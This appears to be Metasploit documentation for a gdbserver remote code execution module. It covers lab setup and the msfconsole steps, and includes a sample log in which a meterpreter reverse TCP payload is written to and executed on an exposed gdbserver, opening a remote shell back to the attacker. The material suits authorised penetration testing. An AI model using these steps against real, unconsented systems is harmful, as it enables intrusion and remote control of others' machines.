## Vulnerable Application

This module attempts to execute an arbitrary payload on a loose
[gdbserver](https://sourceware.org/gdb/onlinedocs/gdb/Server.html) service.

## Installation Steps

Install gdbserver:

```
apt-get install gdbserver
```

## Verification Steps

Start gdbserver on a TCP port:

```
gdbserver 0.0.0.0:1234 /bin/true
```

1. Start msfconsole
1. Do: `use exploit/multi/gdb/gdb_server_exec`
1. Do: `set RHOSTS <ip>`
1. Do: `set RPORT <port>`
1. Do: `run`
1. You should get a session.

## Options

## Scenarios

### gdbserver 10.2 on Ubuntu 20.04 (x86_64)

```
msf6 > use exploit/multi/gdb/gdb_server_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135
rhosts => 192.168.200.135
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234
rport => 1234
msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64
target => x86_64
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
[*] 192.168.200.135:1234 - Stepping program to find PC...
[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...
[*] 192.168.200.135:1234 - Executing the payload...
[*] Sending stage (3020772 bytes) to 192.168.200.135
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 192.168.200.135
OS           : Ubuntu 20.04 (Linux 5.13.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
